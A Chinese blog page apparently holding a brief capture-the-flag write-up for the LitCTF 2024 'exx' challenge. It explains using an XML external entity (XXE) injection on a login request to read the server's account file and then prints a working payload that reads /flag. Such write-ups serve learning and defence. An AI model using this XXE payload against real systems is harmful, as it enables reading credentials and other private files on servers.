当前位置: 首页 > news >正文

[LitCTF 2024]exx

news 2025/7/14 11:41:03

输入任意账号密码进行抓包

考查xxe漏洞

我们加入xxe语句并让它回显我们要它会显的东西:先来读取一下用户名和密码

我们可以看到,它已经读取了服务器下的账号密码文件,接着我们直接读取根目录下的flag文件。通常情况下flag文件的位置一般就根目录和var/www/html目录之下 或者是其父目录之下。存在的形式一般为flag、flag.txt、flag.php

<?xml version="1.0" ?>
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM  "file:///flag">
]>
<user><username>&admin;</username><password>123</password>
</user>

http://www.lryc.cn/news/423684.html

相关文章:

  • kafka运维常用命令
  • 笔记:在WPF中OverridesDefaultStyle属性如何使用
  • MATLAB/Simulink 与Gazebo联合仿真
  • 并查集-应用方向以及衍生汇总+代码实现(c++)-学习一个数据结构就会做三类大题!
  • 设计模式六大原则-开放封闭原则(二)
  • C# 截取两个点之间的线段,等距分割线
  • 打造聊天流式回复效果:Spring Boot+WebSocket + JS实战
  • 202年版最新Python下载安装+PyCharm下载安装激活和使用教程!(附安装包+激活码)
  • 【面试宝典】spring常见面试题总结[上]
  • NC单链表的排序
  • 阿里云部署open-webui实现openai代理服务(持续更新)
  • Vue3简介和快速体验
  • LeetCode98 验证二叉搜索树
  • llama的神经网络结构;llama的神经网络结构中没有MLP吗;nanogpt的神经网络结构;残差是什么;残差连接:主要梯度消失
  • 函数的常量引用入参const saclass sdf,可否传入一个指向saclass对象的指针 shared_ptr<saclass>
  • 数据库:SQL——数据库操作的核心语言
  • Unity + HybridCLR 从零开始
  • C++小总结
  • 从快到慢学习Git指令
  • 传奇游戏发布渠道
  • 如何有效阅读科研论文【方法论】
  • 【揭秘】层层加码,竟能加速渠道营销数字化?-eBest
  • 基于WAMP环境的简单用户登录系统实现(v3版)(持续迭代)
  • 大语言模型与多模态大模型loss计算
  • 线上研讨会 | CATIA助力AI提升汽车造型设计
  • Unity新输入系统 之 InputAction(输入配置文件最基本的单位)
  • 【3】MySQL的安装即启动
  • 变“金点子”为“好应用”,合合信息智能文档处理技术助力大学生探索AI创新边界
  • 央行重提P2P存量业务化解,非吸案开始翻旧账?
  • 8B 端侧小模型 | 能力全面对标GPT-4V!单图、多图、视频理解端侧三冠王,这个国产AI开源项目火爆全网